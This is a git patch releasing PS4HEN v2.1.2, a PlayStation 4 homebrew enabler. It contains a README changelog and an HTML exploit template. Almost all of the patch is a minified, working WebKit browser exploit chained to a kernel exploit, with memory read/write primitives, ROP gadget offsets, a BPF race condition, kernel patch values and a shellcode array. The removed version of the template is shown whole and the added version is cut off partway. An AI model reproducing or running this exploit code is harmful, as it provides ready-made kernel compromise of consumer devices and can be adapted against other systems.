From e13b115e93f88852cefba7c1851f61fbd825b585 Mon Sep 17 00:00:00 2001
From: SiSTR0 <sistrodev@gmail.com>
Date: Wed, 5 Feb 2020 13:02:07 +0100
Subject: [PATCH] release v2.1.2

---
 README.md                   | 11 ++++++-----
 exploit.template            |  2 +-
 exploit/index.html          |  2 +-
 installer/include/defines.h |  4 ++--
 installer/include/offsets.h |  3 +++
 installer/source/main.c     |  5 ++++-
 kpayload/include/offsets.h  |  3 +++
 kpayload/source/fpkg.c      |  1 -
 kpayload/source/fself.c     | 14 +++++++++++---
 kpayload/source/patch.c     |  6 ++++++
 10 files changed, 37 insertions(+), 14 deletions(-)

diff --git a/README.md b/README.md
index b0ee8e4..f36d15c 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# PS4HEN v2.1.1
+# PS4HEN v2.1.2
 
 ## Features
 - Homebrew Enabler
@@ -9,11 +9,12 @@
 - VR Support
 - Remote Package Install
 - Rest Mode Support
-- External HDD Format 6.xx Support
+- External HDD Format 7.xx Support
+- FW Version Spoof to 7.02
+- Debug Trophies Support
  
 ## Fixes
-- Black Screen Fix on Rest Mode
-- FW Version Spoof to 6.70
+- sys_dynlib_dlsym Patch
 
 ## Contributors
 Massive credits to the following:
@@ -32,6 +33,6 @@ Massive credits to the following:
 ## Testers
 - [SCORPION](https://twitter.com/SCORPION1399)
 - [KiiWii](https://twitter.com/defaultdnb)
-- [Leeful74](https://twitter.com/leeful74b)
+- [Leeful74](https://twitter.com/leeful74)
 - [opoisso893](https://twitter.com/opoisso893)
 - Anonymous
\ No newline at end of file
diff --git a/exploit.template b/exploit.template
index 0c54c47..ffad629 100644
--- a/exploit.template
+++ b/exploit.template
@@ -1 +1 @@
-<!DOCTYPE html><html><head><title>PS4Jailbreak 5.05 (HEN)</title><meta name=viewport content="width=device-width, initial-scale=1"><style>.loader{position:absolute;left:50%;top:50%;margin:-75px 0 0 -75px;border:10px solid #f3f3f3;border-radius:50%;border-top:10px solid #044595;border-left:10px solid #044595;width:120px;height:120px;-webkit-animation:spin 1s linear infinite}.info{overflow:hidden;position:fixed;position:absolute;top:50%;left:50%;font-size:45px;font-family:sans-serif;transform:translate(-50%,-50%)}.credits{overflow:hidden;position:fixed;position:absolute;top:90%;left:50%;font-size:16px;font-family:sans-serif;text-align:center;transform:translate(-50%,-90%)}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}</style></head><body style=margin:0><div id=loader class=loader></div><div id=done class=info style=display:none>Done.</div><div id=fail class=info style=display:none>Fail!</div><div id=footer class=credits><ul style=list-style:none;padding-left:0><li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li><a href=#>SiSTRo</a></li><li>anonymous contributors</li></ul></div><script>var p;var s={};var g={};var gc={"pop_r8":96709,"pop_r9":12268047,"pop_rax":17397,"pop_rcx":339545,"pop_rdx":1826852,"pop_rsi":586634,"pop_rdi":232890,"pop_rsp":124551,"jmp_rax":130,"jmp_rdi":2711166,"mov_rdx_rax":3488561,"mov_rdi_rax":22692143,"mov_rax_rdx":1896224,"mov_rbp_rsp":985418,"mov__rdi__rax":3857131,"mov__rdi__rsi":146114,"mov__rax__rsi":2451047,"mov_rax__rax__":444474,"mov_rax__rdi__":290553,"add_rax_rsi":1384646,"and_rax_rsi":22481823,"add_rdi_rax":5593055,"jop":800720,"ret":60,"stack_chk_fail":200,"setjmp":5368};window.onload=function(){setTimeout(exploit,3000);};window.onerror=function(e){document.getElementById("loader").style.display="none";document.getElementById("fail").style.display="block";if(e.startsWith("Error:")==true){alert(e);}else{location.reload();};};function done(){document.getElementById("loader").style.display="none";document.getElementById("done").style.display="block";};var rop=function(){this.stack=new Uint32Array(65536);this.stackBase=p.read8(p.leakval(this.stack).add32(16));this.count=0;this.clear=function(){this.count=0;this.runtime=undefined;for(var i=0;i<4080/2;i++){p.write8(this.stackBase.add32(i*8),0);};};this.pushSymbolic=function(){this.count++;return this.count-1;};this.finalizeSymbolic=function(idx,val){p.write8(this.stackBase.add32(idx*8),val);};this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(),val);};this.push_write8=function(where,what){this.push(g.pop_rdi);this.push(where);this.push(g.pop_rsi);this.push(what);this.push(g.mov__rdi__rsi);};this.fcall=function(rip,rdi,rsi,rdx,rcx,r8,r9){if(rdi!=undefined){this.push(g.pop_rdi);this.push(rdi);};if(rsi!=undefined){this.push(g.pop_rsi);this.push(rsi);};if(rdx!=undefined){this.push(g.pop_rdx);this.push(rdx);};if(rcx!=undefined){this.push(g.pop_rcx);this.push(rcx);};if(r8!=undefined){this.push(g.pop_r8);this.push(r8);};if(r9!=undefined){this.push(g.pop_r9);this.push(r9);};this.push(rip);return this;};this.run=function(){var retv=p.loadchain(this,this.notimes);this.clear();return retv;};return this;};function makeid(){var text="";var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var i=0;i<8;i++){text+=possible.charAt(Math.floor(Math.random()*possible.length));};return text;};var instancespr=[];for(var i=0;i<4096;i++){instancespr[i]=new Uint32Array(1);instancespr[i][makeid()]=50057;};var _dview;function u2d(low,hi){if(!_dview)_dview=new DataView(new ArrayBuffer(16));_dview.setUint32(0,hi);_dview.setUint32(4,low);return _dview.getFloat64(0);};function zeroFill(number,width){width-=number.toString().length;if(width>0){return new Array(width+(/\./.test(number)?2:1)).join("0")+number;};return number+"";};function int64(low,hi){this.low=(low>>>0);this.hi=(hi>>>0);this.add32=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};return new int64(new_lo,new_hi);};this.add32inplace=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};this.hi=new_hi;this.low=new_lo;};this.sub32=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};return new int64(new_lo,new_hi);};this.sub32inplace=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};this.hi=new_hi;this.low=new_lo;};this.toString=function(val){val=16;var lo_str=(this.low>>>0).toString(val);var hi_str=(this.hi>>>0).toString(val);if(this.hi==0)return lo_str;else{lo_str=zeroFill(lo_str,8);};return hi_str+lo_str;};return this;};var nogc=[];var tgt={a:0,b:0,c:0,d:0};var y=new ImageData(1,16384);postMessage("","*",[y.data.buffer]);var props={};for(var i=0;i<16384/2;){props[i++]={value:1111638594};props[i++]={value:tgt};};var foundLeak=undefined;var foundIndex=0;var maxCount=256;while(foundLeak==undefined&&maxCount>0){maxCount--;history.pushState(y,"");Object.defineProperties({},props);var leak=new Uint32Array(history.state.data.buffer);for(var i=0;i<leak.length-6;i++){if(leak[i]==1111638594&&leak[i+1]==4294901760&&leak[i+2]==0&&leak[i+3]==0&&leak[i+4]==0&&leak[i+5]==0&&leak[i+6]==14&&leak[i+7]==0&&leak[i+10]==0&&leak[i+11]==0&&leak[i+12]==0&&leak[i+13]==0&&leak[i+14]==14&&leak[i+15]==0){foundIndex=i;foundLeak=leak;break;};};};if(!foundLeak){throw new Error("infoleak fail");};Array.prototype.__defineGetter__(100,()=>1);var firstLeak=Array.prototype.slice.call(foundLeak,foundIndex,foundIndex+64);var leakJSVal=new int64(firstLeak[8],firstLeak[9]);var f=document.body.appendChild(document.createElement("iframe"));var a=new f.contentWindow.Array(13.37,13.37);var b=new f.contentWindow.Array(u2d(leakJSVal.low+16,leakJSVal.hi),13.37);var master=new Uint32Array(4096);var slave=new Uint32Array(4096);var leakval_u32=new Uint32Array(4096);var leakval_helper=[slave,2,3,4,5,6,7,8,9,10];tgt.a=u2d(2048,23077632);tgt.b=0;tgt.c=leakval_helper;tgt.d=4919;var c=Array.prototype.concat.call(a,b);document.body.removeChild(f);var hax=c[0];c[0]=0;tgt.c=c;hax[2]=0;hax[3]=0;Object.defineProperty(Array.prototype,100,{get:undefined});tgt.c=leakval_helper;var butterfly=new int64(hax[2],hax[3]);butterfly.low+=16;tgt.c=leakval_u32;var lkv_u32_old=new int64(hax[4],hax[5]);hax[4]=butterfly.low;hax[5]=butterfly.hi;tgt.c=master;hax[4]=leakval_u32[0];hax[5]=leakval_u32[1];var a2sb=new int64(master[4],master[5]);tgt.c=leakval_u32;hax[4]=lkv_u32_old.low;hax[5]=lkv_u32_old.hi;tgt.c=0;hax=0;var p={write8:function(addr,val){master[4]=addr.low;master[5]=addr.hi;if(val instanceof int64){slave[0]=val.low;slave[1]=val.hi;}else{slave[0]=val;slave[1]=0;};master[4]=a2sb.low;master[5]=a2sb.hi;},write4:function(addr,val){master[4]=addr.low;master[5]=addr.hi;slave[0]=val;master[4]=a2sb.low;master[5]=a2sb.hi;},read8:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=new int64(slave[0],slave[1]);master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},read4:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=slave[0];master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},leakval:function(jsval){leakval_helper[0]=jsval;var rtv=this.read8(butterfly);this.write8(butterfly,new int64(1094795585,4294901760));return rtv;}};var get_jmptgt=function(addr){var z=p.read4(addr)&65535;var y=p.read4(addr.add32(2));if(z!=9727)return 0;return addr.add32(y+6);};var exploit=function(){p.leakfunc=function(func){var fptr_store=p.leakval(func);return(p.read8(fptr_store.add32(24))).add32(64);};var parseFloatStore=p.leakfunc(parseFloat);var webKitBase=p.read8(parseFloatStore);webKitBase.low&=4294963200;webKitBase.sub32inplace(5881856-147456);var o2wk=function(o){return webKitBase.add32(o);};for(var gn in gc){if(gc.hasOwnProperty(gn)){g[gn]=o2wk(gc[gn]);};};var libKernelBase=p.read8(get_jmptgt(g.stack_chk_fail));libKernelBase.low&=4294963200;libKernelBase.sub32inplace(53248+16384);var wkview=new Uint8Array(4096);var wkstr=p.leakval(wkview).add32(16);p.write8(wkstr,webKitBase);p.write4(wkstr.add32(8),57131008);var hold1;var hold2;var holdz;var holdz1;while(1){hold1={a:0,b:0,c:0,d:0};hold2={a:0,b:0,c:0,d:0};holdz1=p.leakval(hold2);holdz=p.leakval(hold1);if(holdz.low-48==holdz1.low)break;};var pushframe=[];pushframe.length=128;var funcbuf;var funcbuf32=new Uint32Array(256);nogc.push(funcbuf32);var launch_chain=function(chain){var stackPointer=0;var stackCookie=0;var orig_reenter_rip=0;var reenter_help={length:{valueOf:function(){orig_reenter_rip=p.read8(stackPointer);stackCookie=p.read8(stackPointer.add32(8));var returnToFrame=stackPointer;var ocnt=chain.count;chain.push_write8(stackPointer,orig_reenter_rip);chain.push_write8(stackPointer.add32(8),stackCookie);if(chain.runtime)returnToFrame=chain.runtime(stackPointer);chain.push(g.pop_rsp);chain.push(returnToFrame);chain.count=ocnt;p.write8(stackPointer,(g.pop_rsp));p.write8(stackPointer.add32(8),chain.stackBase);}}};funcbuf=p.read8(p.leakval(funcbuf32).add32(16));p.write8(funcbuf.add32(48),g.setjmp);p.write8(funcbuf.add32(128),g.jop);p.write8(funcbuf,funcbuf);p.write8(parseFloatStore,g.jop);var orig_hold=p.read8(holdz1);var orig_hold48=p.read8(holdz1.add32(72));p.write8(holdz1,funcbuf.add32(80));p.write8(holdz1.add32(72),funcbuf);parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);p.write8(holdz1,orig_hold);p.write8(holdz1.add32(72),orig_hold48);stackPointer=p.read8(funcbuf.add32(16));rtv=Array.prototype.splice.apply(reenter_help);return p.leakval(rtv);};p.loadchain=launch_chain;var kview=new Uint8Array(4096);var kstr=p.leakval(kview).add32(16);p.write8(kstr,libKernelBase);p.write4(kstr.add32(8),262144);var countbytes;for(var i=0;i<262144;i++){if(kview[i]==114&&kview[i+1]==100&&kview[i+2]==108&&kview[i+3]==111&&kview[i+4]==99){countbytes=i;break;};};p.write4(kstr.add32(8),countbytes+32);var dview32=new Uint32Array(1);var dview8=new Uint8Array(dview32.buffer);for(var i=0;i<countbytes;i++){if(kview[i]==72&&kview[i+1]==199&&kview[i+2]==192&&kview[i+7]==73&&kview[i+8]==137&&kview[i+9]==202&&kview[i+10]==15&&kview[i+11]==5){dview8[0]=kview[i+3];dview8[1]=kview[i+4];dview8[2]=kview[i+5];dview8[3]=kview[i+6];var syscallno=dview32[0];s[syscallno]=libKernelBase.add32(i);};};var chain=new rop();var returnvalue;p.fcall_=function(rip,rdi,rsi,rdx,rcx,r8,r9){chain.clear();chain.notimes=this.next_notime;this.next_notime=1;chain.fcall(rip,rdi,rsi,rdx,rcx,r8,r9);chain.push(g.pop_rdi);chain.push(chain.stackBase.add32(16376));chain.push(g.mov__rdi__rax);chain.push(g.pop_rax);chain.push(p.leakval(1094795842));if(chain.run().low!=1094795842){throw new Error("unexpected rop behaviour");};returnvalue=p.read8(chain.stackBase.add32(16376));};p.fcall=function(){p.fcall_.apply(this,arguments);return returnvalue;};p.readstr=function(addr){var addr_=addr.add32(0);var rd=p.read4(addr_);var buf="";while(rd&255){buf+=String.fromCharCode(rd&255);addr_.add32inplace(1);rd=p.read4(addr_);};return buf;};p.syscall=function(sysc,rdi,rsi,rdx,rcx,r8,r9){if(typeof sysc!="number"){throw new Error("invalid syscall");};var off=s[sysc];if(off==undefined){throw new Error("invalid syscall");};return p.fcall(off,rdi,rsi,rdx,rcx,r8,r9);};p.sptr=function(str){var bufView=new Uint8Array(str.length+1);for(var i=0;i<str.length;i++){bufView[i]=str.charCodeAt(i)&255;};nogc.push(bufView);return p.read8(p.leakval(bufView).add32(16));};p.malloc=function(sz){var backing=new Uint8Array(65536+sz);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=backing;return ptr;};p.malloc32=function(sz){var backing=new Uint8Array(65536+sz*4);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=new Uint32Array(backing.buffer);return ptr;};var test=p.syscall(23,0);if(test!="0"){var fd=p.syscall(5,p.sptr("/dev/bpf0"),2).low;var fd1=p.syscall(5,p.sptr("/dev/bpf0"),2).low;if(fd==(-1>>>0)){throw new Error("open bpf fail");};var bpf_valid=p.malloc32(16384);var bpf_spray=p.malloc32(16384);var bpf_valid_u32=bpf_valid.backing;var bpf_valid_prog=p.malloc(64);p.write8(bpf_valid_prog,2048/8);p.write8(bpf_valid_prog.add32(8),bpf_valid);var bpf_spray_prog=p.malloc(64);p.write8(bpf_spray_prog,2048/8);p.write8(bpf_spray_prog.add32(8),bpf_spray);for(var i=0;i<1024;){bpf_valid_u32[i++]=6;bpf_valid_u32[i++]=0;};var rtv=p.syscall(54,fd,2148549243,bpf_valid_prog);if(rtv.low!=0){throw new Error("ioctl bpf fail");};var spawnthread=function(name,chain){var longjmp=webKitBase.add32(5352);var createThread=webKitBase.add32(7836560);var contextp=p.malloc32(8192);var contextz=contextp.backing;contextz[0]=1337;var thread2=new rop();thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);chain(thread2);p.write8(contextp,g.ret);p.write8(contextp.add32(16),thread2.stackBase);p.syscall(324,1);var retv=function(){p.fcall(createThread,longjmp,contextp,p.sptr(name));};nogc.push(contextp);nogc.push(thread2);return retv;};var interrupt1,loop1;var sock=p.syscall(97,2,2);var kscratch=p.malloc32(4096);var start1=spawnthread("GottaGoFast",function(thread2){interrupt1=thread2.stackBase;thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.pop_rdi);thread2.push(fd);thread2.push(g.pop_rsi);thread2.push(2148549243);thread2.push(g.pop_rdx);thread2.push(bpf_valid_prog);thread2.push(g.pop_rsp);thread2.push(thread2.stackBase.add32(2048));thread2.count=256;var cntr=thread2.count;thread2.push(s[54]);thread2.push_write8(thread2.stackBase.add32(cntr*8),s[54]);thread2.push(g.pop_rdi);var wherep=thread2.pushSymbolic();thread2.push(g.pop_rsi);var whatp=thread2.pushSymbolic();thread2.push(g.mov__rdi__rsi);thread2.push(g.pop_rsp);loop1=thread2.stackBase.add32(thread2.count*8);thread2.push(1094795585);thread2.finalizeSymbolic(wherep,loop1);thread2.finalizeSymbolic(whatp,loop1.sub32(8));});var krop=new rop();var race=new rop();var ctxp=p.malloc32(8192);var ctxp1=p.malloc32(8192);var ctxp2=p.malloc32(8192);p.write8(bpf_spray.add32(16),ctxp);p.write8(ctxp.add32(80),0);p.write8(ctxp.add32(104),ctxp1);var stackshift_from_retaddr=0;p.write8(ctxp1.add32(16),o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(ctxp.add32(0),ctxp2);p.write8(ctxp.add32(16),ctxp2.add32(8));p.write8(ctxp2.add32(2000),o2wk(7271653));var iterbase=ctxp2;for(var i=0;i<15;i++){p.write8(iterbase,o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(iterbase.add32(2000+32),o2wk(7271653));p.write8(iterbase.add32(8),iterbase.add32(32));p.write8(iterbase.add32(24),iterbase.add32(32+8));iterbase=iterbase.add32(32);};var raxbase=iterbase;var rdibase=iterbase.add32(8);var memcpy=get_jmptgt(webKitBase.add32(248));memcpy=p.read8(memcpy);p.write8(raxbase,o2wk(22848539));stackshift_from_retaddr+=8;p.write8(rdibase.add32(112),o2wk(19417140));stackshift_from_retaddr+=8;p.write8(rdibase.add32(24),rdibase);p.write8(rdibase.add32(8),krop.stackBase);p.write8(raxbase.add32(48),g.mov_rbp_rsp);p.write8(rdibase,raxbase);p.write8(raxbase.add32(1056),o2wk(2566497));p.write8(raxbase.add32(64),memcpy.add32(194-144));var topofchain=stackshift_from_retaddr+40;p.write8(rdibase.add32(176),topofchain);for(var i=0;i<4096/8;i++){p.write8(krop.stackBase.add32(i*8),g.ret);};krop.count=16;var kpatch=function(offset,qword){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.pop_rsi);krop.push(qword);krop.push(g.mov__rax__rsi);};var kpatch2=function(offset,offset2){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset2);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);};p.write8(kscratch.add32(1056),g.pop_rdi);p.write8(kscratch.add32(64),g.pop_rax);p.write8(kscratch.add32(24),kscratch);krop.push(g.pop_rdi);krop.push(kscratch.add32(24));krop.push(g.mov_rbp_rsp);var rboff=topofchain-krop.count*8+40;krop.push(o2wk(2566497));krop.push(g.pop_rax);krop.push(rboff);krop.push(g.add_rdi_rax);krop.push(g.mov_rax__rdi__);krop.push(g.pop_rsi);krop.push(762);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);var shellbuf=p.malloc32(4096);krop.push(g.pop_rdi);krop.push(kscratch);krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(808116);krop.push(g.add_rax_rsi);krop.push(g.pop_rdi);krop.push(kscratch.add32(8));krop.push(g.mov__rdi__rax);krop.push(g.jmp_rax);krop.push(g.pop_rdi);krop.push(kscratch.add32(16));krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(new int64(4294901759,4294967295));krop.push(g.and_rax_rsi);krop.push(g.mov_rdx_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.mov_rax_rdx);krop.push(g.jmp_rdi);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(221338);krop.push(g.add_rax_rsi);krop.push(g.mov_rax__rax__);krop.push(g.pop_rdi);krop.push(kscratch.add32(816));krop.push(g.mov__rdi__rax);kpatch(221338,new int64(2425420344,2425393296));kpatch(20169540,shellbuf);kpatch(new int64(4293816070,4294967295),new int64(184,3297329408));kpatch(new int64(4293470503,4294967295),new int64(0,1082624841));kpatch(new int64(4293470533,4294967295),new int64(2425388523,1922076816));kpatch(new int64(4294769332,4294967295),new int64(934690871,826654769));kpatch(828366,new int64(233,2336788480));kpatch(1329844,new int64(2428747825,2425393296));kpatch(new int64(15789236,0),new int64(2,0));kpatch2(new int64(15789244,0),new int64(4293548276,4294967295));kpatch(new int64(15789276,0),new int64(0,1));krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(16));krop.push(g.mov_rax__rax__);krop.push(g.jmp_rdi);krop.push(o2wk(380345));krop.push(kscratch.add32(4096));var kq=p.malloc32(16);var kev=p.malloc32(256);kev.backing[0]=sock;kev.backing[2]=131071;kev.backing[3]=1;kev.backing[4]=5;var shcode=[35817,2425393152,2425393296,2425393296,8567125,2303246336,1096172005,1398030677,2303275535,3149957588,256,551862601,1220806985,9831821,2370371584,4265616532,2370699263,3767542964,2370633744,1585456300,2169045059,1265721540,277432321,4202255,698,3867757568,524479,3607052544,960335176,1207959552,3224487561,2211839809,3698655723,1103114587,1096630620,2428722526,1032669269,4294967160,2303260209,15293925,1207959552,770247,2303262720,3271888842,1818324331,979595116,628633632,1815490864,2648,0,0,0,0,0,0,0,0,0,0,0,0,0,0];for(var i=0;i<shcode.length;i++){shellbuf.backing[i]=shcode[i];};start1();while(1){race.count=0;race.push(s[362]);race.push(g.pop_rdi);race.push(kq);race.push(g.mov__rdi__rax);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push_write8(loop1,interrupt1);race.push(g.pop_rdi);race.push(fd);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_valid_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(g.pop_rsi);race.push(kev);race.push(g.pop_rdx);race.push(1);race.push(g.pop_rcx);race.push(0);race.push(g.pop_r8);race.push(0);race.push(s[363]);race.push(g.pop_rdi);race.push(fd1);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_spray_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(s[6]);race.run();if(kscratch.backing[0]!=0){p.syscall(74,shellbuf,16384,7);p.fcall(shellbuf);break;};};};var createThread=webKitBase.add32(7836560);var payloadbuf=p.malloc32(16384);###for(var i=0;i<payload.length;i++){payloadbuf.backing[i]=payload[i];};p.syscall(74,payloadbuf,65536,7);p.syscall(324,1);p.fcall(createThread,payloadbuf,0,p.sptr("payload"));alert("All done! Have fun with Homebrew!");done();}</script></body></html>
\ No newline at end of file
+<!DOCTYPE html><html><head><title>PS4Jailbreak 5.05 (HEN)</title><meta name=viewport content="width=device-width, initial-scale=1"><style>.loader{position:absolute;left:50%;top:50%;margin:-75px 0 0 -75px;border:10px solid #f3f3f3;border-radius:50%;border-top:10px solid #044595;border-left:10px solid #044595;width:120px;height:120px;-webkit-animation:spin 1s linear infinite}.info{overflow:hidden;position:fixed;position:absolute;top:50%;left:50%;font-size:45px;font-family:sans-serif;transform:translate(-50%,-50%)}.credits{overflow:hidden;position:fixed;position:absolute;top:90%;left:50%;font-size:16px;font-family:sans-serif;text-align:center;transform:translate(-50%,-90%)}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}</style></head><body style=margin:0><div id=loader class=loader></div><div id=done class=info style=display:none>Done.</div><div id=fail class=info style=display:none>Fail!</div><div id=footer class=credits><ul style=list-style:none;padding-left:0><li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li><a href=#>SiSTRo</a></li><li>anonymous contributors</li></ul></div><script>var p;var s={};var g={};var gc={"pop_r8":96709,"pop_r9":12268047,"pop_rax":17397,"pop_rcx":339545,"pop_rdx":1826852,"pop_rsi":586634,"pop_rdi":232890,"pop_rsp":124551,"jmp_rax":130,"jmp_rdi":2711166,"mov_rdx_rax":3488561,"mov_rdi_rax":22692143,"mov_rax_rdx":1896224,"mov_rbp_rsp":985418,"mov__rdi__rax":3857131,"mov__rdi__rsi":146114,"mov__rax__rsi":2451047,"mov_rax__rax__":444474,"mov_rax__rdi__":290553,"add_rax_rsi":1384646,"and_rax_rsi":22481823,"add_rdi_rax":5593055,"jop":800720,"ret":60,"stack_chk_fail":200,"setjmp":5368};window.onload=function(){setTimeout(exploit,3000);};window.onerror=function(e){document.getElementById("loader").style.display="none";document.getElementById("fail").style.display="block";if(e.startsWith("Error:")==true){alert(e);}else{location.reload();};};function done(){document.getElementById("loader").style.display="none";document.getElementById("done").style.display="block";};var rop=function(){this.stack=new Uint32Array(65536);this.stackBase=p.read8(p.leakval(this.stack).add32(16));this.count=0;this.clear=function(){this.count=0;this.runtime=undefined;for(var i=0;i<4080/2;i++){p.write8(this.stackBase.add32(i*8),0);};};this.pushSymbolic=function(){this.count++;return this.count-1;};this.finalizeSymbolic=function(idx,val){p.write8(this.stackBase.add32(idx*8),val);};this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(),val);};this.push_write8=function(where,what){this.push(g.pop_rdi);this.push(where);this.push(g.pop_rsi);this.push(what);this.push(g.mov__rdi__rsi);};this.fcall=function(rip,rdi,rsi,rdx,rcx,r8,r9){if(rdi!=undefined){this.push(g.pop_rdi);this.push(rdi);};if(rsi!=undefined){this.push(g.pop_rsi);this.push(rsi);};if(rdx!=undefined){this.push(g.pop_rdx);this.push(rdx);};if(rcx!=undefined){this.push(g.pop_rcx);this.push(rcx);};if(r8!=undefined){this.push(g.pop_r8);this.push(r8);};if(r9!=undefined){this.push(g.pop_r9);this.push(r9);};this.push(rip);return this;};this.run=function(){var retv=p.loadchain(this,this.notimes);this.clear();return retv;};return this;};function makeid(){var text="";var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var i=0;i<8;i++){text+=possible.charAt(Math.floor(Math.random()*possible.length));};return text;};var instancespr=[];for(var i=0;i<4096;i++){instancespr[i]=new Uint32Array(1);instancespr[i][makeid()]=50057;};var _dview;function u2d(low,hi){if(!_dview)_dview=new DataView(new ArrayBuffer(16));_dview.setUint32(0,hi);_dview.setUint32(4,low);return _dview.getFloat64(0);};function zeroFill(number,width){width-=number.toString().length;if(width>0){return new Array(width+(/\./.test(number)?2:1)).join("0")+number;};return number+"";};function int64(low,hi){this.low=(low>>>0);this.hi=(hi>>>0);this.add32=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};return new int64(new_lo,new_hi);};this.add32inplace=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};this.hi=new_hi;this.low=new_lo;};this.sub32=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};return new int64(new_lo,new_hi);};this.sub32inplace=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};this.hi=new_hi;this.low=new_lo;};this.toString=function(val){val=16;var lo_str=(this.low>>>0).toString(val);var hi_str=(this.hi>>>0).toString(val);if(this.hi==0)return lo_str;else{lo_str=zeroFill(lo_str,8);};return hi_str+lo_str;};return this;};var nogc=[];var tgt={a:0,b:0,c:0,d:0};var y=new ImageData(1,16384);postMessage("","*",[y.data.buffer]);var props={};for(var i=0;i<16384/2;){props[i++]={value:1111638594};props[i++]={value:tgt};};var foundLeak=undefined;var foundIndex=0;var maxCount=256;while(foundLeak==undefined&&maxCount>0){maxCount--;history.pushState(y,"");Object.defineProperties({},props);var leak=new Uint32Array(history.state.data.buffer);for(var i=0;i<leak.length-6;i++){if(leak[i]==1111638594&&leak[i+1]==4294901760&&leak[i+2]==0&&leak[i+3]==0&&leak[i+4]==0&&leak[i+5]==0&&leak[i+6]==14&&leak[i+7]==0&&leak[i+10]==0&&leak[i+11]==0&&leak[i+12]==0&&leak[i+13]==0&&leak[i+14]==14&&leak[i+15]==0){foundIndex=i;foundLeak=leak;break;};};};if(!foundLeak){throw new Error("infoleak fail");};Array.prototype.__defineGetter__(100,()=>1);var firstLeak=Array.prototype.slice.call(foundLeak,foundIndex,foundIndex+64);var leakJSVal=new int64(firstLeak[8],firstLeak[9]);var f=document.body.appendChild(document.createElement("iframe"));var a=new f.contentWindow.Array(13.37,13.37);var b=new f.contentWindow.Array(u2d(leakJSVal.low+16,leakJSVal.hi),13.37);var master=new Uint32Array(4096);var slave=new Uint32Array(4096);var leakval_u32=new Uint32Array(4096);var leakval_helper=[slave,2,3,4,5,6,7,8,9,10];tgt.a=u2d(2048,23077632);tgt.b=0;tgt.c=leakval_helper;tgt.d=4919;var c=Array.prototype.concat.call(a,b);document.body.removeChild(f);var hax=c[0];c[0]=0;tgt.c=c;hax[2]=0;hax[3]=0;Object.defineProperty(Array.prototype,100,{get:undefined});tgt.c=leakval_helper;var 